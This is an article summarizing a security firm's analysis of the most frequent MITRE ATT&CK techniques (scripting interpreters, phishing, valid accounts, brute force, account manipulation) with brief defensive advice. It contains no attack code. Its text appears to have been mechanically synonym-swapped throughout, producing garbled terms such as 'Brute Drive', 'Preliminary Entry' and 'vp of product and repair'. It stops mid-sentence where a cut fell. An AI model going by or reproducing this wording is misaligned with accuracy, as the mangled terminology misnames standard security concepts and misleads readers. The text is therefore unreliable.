Prime MITRE ATT&CK Methods and The way to Defend In opposition to Them

Of the a whole lot of documented MITRE ATT&CK methods, two dominate the sphere: command and scripting interpreters (T1059) and phishing (T1566).

In a report revealed on April 10, D3 Safety analyzed greater than 75,000 current cybersecurity incidents. Its aim was to find out which strategies of assault have been commonest.

The outcomes paint a stark image: these two methods outpaced all others by orders of magnitude, with the highest approach outpacing the runner-up by an element of three.

For defenders trying to allocate restricted consideration and assets, listed here are simply a number of the commonest ATT&CK methods, and the way to defend towards them.

Execution: Command and Scripting Interpreter (Utilized in 52.22% of Assaults)

What it’s: Attackers write scripts in widespread languages like PowerShell and Python for 2 main functions. Mostly, they’re used to automate malicious duties similar to harvesting information or downloading and extracting a payload. They’re additionally helpful for evading detection — bypassing antivirus options, prolonged detection and response (XDR), and the like.

That these scripts are far and away No. 1 on this listing is further stunning to Adrianna Chen, D3’s vp of product and repair. “Since Command and Scripting Interpreter (T1059) falls underneath the Execution tactic, it’s within the center stage of the MITRE ATT&CK kill chain,” she says. “So, it’s honest to imagine that different methods from earlier ways have already gone undetected by the point that it is detected by the EDR instrument. On condition that this one approach was so distinguished in our information set, it underscores the significance of getting processes to hint again to the origin of an incident.”

The way to defend towards it: As a result of malicious scripts are numerous and multifaceted, coping with them requires a radical incident response plan that mixes detection of probably malicious behaviors with strict watch over privileges and script execution insurance policies.

Preliminary Entry: Phishing (15.44%)

What it’s: Phishing and its subcategory, spear-phishing (T1566.001-004), are the primary and third commonest methods attackers achieve entry to focused techniques and networks. Utilizing the primary normally campaigns and the second when aiming for particular people or organizations, the aim is to coerce victims into divulging essential data that can permit a foothold into delicate accounts and gadgets.

The way to defend towards it: Even the neatest and most educated amongst us fall for stylish social engineering. Frequent schooling and consciousness campaigns can go some methods towards defending staff from themselves and the businesses they supply a window into.

Preliminary Entry: Legitimate Accounts (3.47%)

What it’s: Typically, profitable phishing permits attackers entry to legit accounts. These accounts present keys to in any other case locked doorways, and canopy for his or her varied misdeeds.

The way to defend towards it: When staff inevitably click on on that malicious PDF or URL, sturdy multifactor authentication (MFA) can, if nothing else, act as extra hoops for attackers to leap via. Anomaly detection instruments also can assist if, for instance, a wierd consumer connects from a faraway IP handle, or just does one thing they don’t seem to be anticipated to do.

Credential Entry: Brute Drive (2.05%)

What it’s: A extra widespread possibility again within the olden days, brute power assaults have caught round due to the ubiquity of weak, reused, and unchanged passwords. Right here, attackers use scripts that robotically run via username and password combos — similar to in a dictionary assault — to achieve entry to desired accounts.

The way to defend towards it: No merchandise on this listing is as simply and wholly preventable as brute-force assaults. Utilizing robust sufficient passwords fixes the issue by itself, full cease. Different little mechanisms, like locking out a consumer after repeated login makes an attempt, additionally do the trick.

Persistence: Account Manipulation (1.34%)

What it’s: As soon as an attacker has used phishing, brute power, or another means to entry a privileged account, they will then leverage that account to cement their place in a focused system. For instance, they will change the account’s credentials to lock out its authentic proprietor, or presumably regulate permissions to be able to entry much more privileged assets than they have already got.

The way to defend towards it: To mitigate the injury from an account compromise, D3 recommends organizations implement stringent restrictions for accessing delicate assets, and observe the precept of least privileged entry: granting not more than the minimal degree of entry vital for any consumer to carry out his or her job.

In addition to that, it presents plenty of suggestions that may apply to this and different MITRE methods, together with: